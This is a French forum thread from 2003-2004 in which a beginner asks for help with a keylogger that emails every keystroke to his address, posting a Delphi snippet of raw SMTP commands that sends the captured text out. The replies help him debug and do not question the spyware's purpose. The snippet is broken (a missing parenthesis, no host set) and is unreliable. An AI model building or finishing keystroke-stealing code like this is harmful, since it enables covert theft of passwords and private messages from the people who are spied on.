Envoyer un email san utiliser de composant smtp

mas0 Messages postés 1 Date d'inscription dimanche 2 novembre 2003 Statut Membre Dernière intervention 14 novembre 2003 - 14 nov. 2003 à 20:01
Filipe35 Messages postés 470 Date d'inscription vendredi 14 novembre 2003 Statut Membre Dernière intervention 23 octobre 2007 - 27 déc. 2004 à 04:12
salut j'ui un newbie et en ce moment j'essaye de faire un petit keylogger ki m'envoi tout ce ki es entre sur le clavier sur mon address email. j'ai tout essaye... sakmtp, winshoes, nmsmtp. rien ne fonctionne.(sa marche kan je teste avec les exemples mais kan j'essaye de modifier rien ne pase) j'ai deja reussi a faire fonctioner mon keylogger. j'arriv a detecter une connection net. j'ai aucune idee pourkoi sa marche pas. je voudrai envoyer directement les commandes au serveur smtp. comme pour telnet. j'ai essaye ce bout de code.

try
begin
with clientmain do
begin
Open;
Socket.SendText('HELO katg666@hotmail.com'#13#10
Socket.SendText('mail from:katg666@hotmail.com'#13#10);
Socket.SendText('rcpt to:katg666@hotmail.com'#13#10 );
Socket.SendText('DATA'#13#10);
Socket.SendText('To: katg666@hotmail.com'#13#10);
Socket.SendText('From: katg666@hotmail.com'#13#10);
Socket.SendText('Subject: 3rdpty'#13#10);
Socket.SendText(mailtext.text + #13#10);
Socket.SendText('.'#13#10);
end;

end;
except
showmessage('Can''t connect to ' + ClientMain.host + '...');
end;

sa marche tjrs pa. qqn pourrai m'aider et m'expliquer comment je pourrai corriger si ya des erruers. le prog me dis rien comme erreur mai rien n'arrive dans ma oite. ce serai sympa si je pouvai completement eliminer l'utilisation d'un serveur smtp. l'envoyer directement petre un server built in? merci d'avance

2 réponses

Neo29finist Messages postés 1 Date d'inscription vendredi 19 décembre 2003 Statut Membre Dernière intervention 26 novembre 2004
26 nov. 2004 à 21:47
Envoi le code entier du prog stp, just avec sa, on ne peu pas grand chose !
0
Filipe35 Messages postés 470 Date d'inscription vendredi 14 novembre 2003 Statut Membre Dernière intervention 23 octobre 2007 1
27 déc. 2004 à 04:12
salut,

perso je ne voi nul part ou tu te connecte !

kel est l'adresse de ton serveur smtp ?

Fil
0
Rejoignez-nous